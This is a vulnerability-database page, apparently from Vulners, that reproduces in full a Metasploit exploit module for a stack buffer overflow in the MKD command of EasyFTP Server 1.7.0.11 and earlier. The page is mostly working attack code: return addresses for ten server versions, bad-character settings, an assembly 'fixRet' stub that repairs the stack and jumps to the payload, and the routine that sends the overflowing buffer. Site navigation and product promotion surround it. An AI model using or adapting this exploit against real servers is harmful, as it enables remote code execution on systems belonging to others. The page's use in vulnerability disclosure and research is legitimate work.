Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow

🗓️ 27 Jul 2010 00:00:00Reported by x90cType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow. Stack-based buffer overflow in EasyFTP Server 1.7.0.11 parsing 'MKD' commands. Exploits a small piece of code 'fixRet' to inject a ~500 byte payload into a 264 byte buffer

Code
`##  
# $Id: easyftp_mkd_fixret.rb 9935 2010-07-27 02:25:15Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Ftp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11  
and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which  
leads to a stack based buffer overflow.  
  
NOTE: EasyFTP allows anonymous access by default. However, in order to access the  
'MKD' command, you must have access to an account that can create directories.  
  
After version 1.7.0.12, this package was renamed "UplusFtp".  
  
This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.  
This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by  
'fixing' the return address post-exploitation. See references for more information.  
},  
'Author' =>  
[  
'x90c', # original version  
'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads)  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 9935 $',  
'References' =>  
[  
[ 'OSVDB', '62134' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/12044/' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/14399/' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 512,  
'BadChars' => "\x00\x0a\x0d\x2f\x5c",  
'DisableNops' => true  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe  
[ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe  
],  
'DisclosureDate' => 'Apr 04 2010',  
'DefaultTarget' => 0))  
end  
  
def check  
connect  
disconnect  
  
if (banner =~ /BigFoolCat/)  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
def make_nops(num); "C" * num; end  
  
def exploit  
connect_login  
  
# NOTE:  
# This exploit jumps to ebp, which happens to point at a partial version of  
# the 'buf' string in memory. The fixRet below fixes up the code stored on the  
# stack and then jumps there to execute the payload. The value in esp is used  
# with an offset for the fixup.  
fixRet_asm = %q{  
mov edi,esp  
sub edi, 0xfffffe10  
mov [edi], 0xfeedfed5  
add edi, 0xffffff14  
jmp edi  
}  
fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string  
  
buf = ''  
  
print_status("Prepending fixRet...")  
buf << fixRet  
buf << make_nops(0x20 - buf.length)  
  
print_status("Adding the payload...")  
buf << payload.encoded  
  
# Patch the original stack data into the fixer stub  
buf[10, 4] = buf[268, 4]  
  
print_status("Overwriting part of the payload with target address...")  
buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes  
  
print_status("Sending exploit buffer...")  
send_cmd( ['MKD', buf] , false)  
  
handler  
disconnect  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jul 2010 00:00Current
0.7Low risk
Vulners AI Score0.7
easyftpserverbuffer overflowmkd commandstack-basedexploitpayloadstacksecurityanonymous accessmetasploit frameworkvulnerabledisclosure datereferenceswindows platform
17